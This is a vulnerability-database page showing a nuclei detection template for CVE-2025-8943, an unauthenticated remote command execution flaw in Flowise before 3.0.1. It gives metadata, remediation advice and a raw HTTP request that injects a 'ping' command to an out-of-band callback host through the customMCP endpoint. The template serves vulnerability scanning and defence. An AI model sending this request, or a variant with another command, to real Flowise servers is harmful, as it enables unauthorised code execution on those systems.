Lucene search
K

Flowise < 3.0.1 - Remote Command Execution

🗓️ 03 Jun 2026 06:04:49Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 18 Views

Flowise versions prior to 3.0.1 allow unauthenticated remote command execution due to weak authentication and no role based access control.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2025-8943
20 Aug 202520:44
circl
CNNVD
Flowise 安全漏洞
14 Aug 202500:00
cnnvd
CVE
CVE-2025-8943
14 Aug 202509:54
cve
Cvelist
CVE-2025-8943 Unsupervised OS command execution leads to remote code execution by unauthenticated network attackers
14 Aug 202509:54
cvelist
EUVD
EUVD-2025-24801
3 Oct 202520:07
euvd
Github Security Blog
Flowise OS command remote code execution
14 Aug 202512:30
github
Metasploit
Flowise Custom MCP Remote Code Execution
22 Nov 202518:57
metasploit
NVD
CVE-2025-8943
14 Aug 202510:15
nvd
OSV
GHSA-2VV2-3X8X-4GV7 Flowise OS command remote code execution
14 Aug 202512:30
osv
Packet Storm
📄 Flowise Custom MCP Remote Code Execution
24 Nov 202500:00
packetstorm
Rows per page
id: CVE-2025-8943

info:
  name: Flowise < 3.0.1 - Remote Command Execution
  author: zezezez
  severity: critical
  description: |
    The Custom MCPs feature is designed to execute OS commands, for instance, using tools like `npx` to spin up local MCP Servers. However, Flowise's inherent authentication and authorization model is minimal and lacks role-based access controls (RBAC). Furthermore, in Flowise versions before 3.0.1 the default installation operates without authentication unless explicitly configured. This combination allows unauthenticated network attackers to execute unsandboxed OS commands.
  impact: |
    Successful exploitation allows attackers to execute arbitrary OS commands on the target server, potentially leading to complete system compromise, data theft, and lateral movement within the network.
  remediation: |
    Update Flowise to the latest version that addresses this vulnerability. Implement proper input validation and sanitization for the customMCP endpoint parameters.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2025-8943
    - https://www.cve.org/CVERecord?id=CVE-2025-8943
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-8943
    epss-score: 0.79949
    epss-percentile: 0.99132
    cwe-id: CWE-78
    cpe: cpe:2.3:a:flowiseai:flowise:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: flowiseai
    product: flowise
    shodan-query: http.title:"Flowise"
  tags: cve,cve2025,rce,flowise,oast,fictional,vkev,ai

http:
  - raw:
      - |
        POST /api/v1/node-load-method/customMCP HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json
        x-request-from: internal

        {
            "inputs": {
                "mcpServerConfig": {
                    "command": "ping",
                    "args": [
                        "{{interactsh-url}}",
                        "-c",
                        "4"
                    ]
                }
            },
            "loadMethod": "listActions"
        }

    matchers:
      - type: dsl
        dsl:
          - 'contains(interactsh_protocol, "dns")'
          - 'contains_all(body, "No Available Actions", "label\":")'
          - 'contains_any(content_type, "application/json")'
          - 'status_code == 200'
        condition: and
# digest: 4a0a00473045022100e7a3e95a9121acd2cdd04dc71c455d15dce2b20260a2a23cd668331bf636e1b202201a89512f63850b402d5fd879777ea105abd9758b38f2964f0263ef167bdc0a4b:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.1Medium risk
Vulners AI Score6.1
CVSS 3.19.8
EPSS0.79949
SSVC
18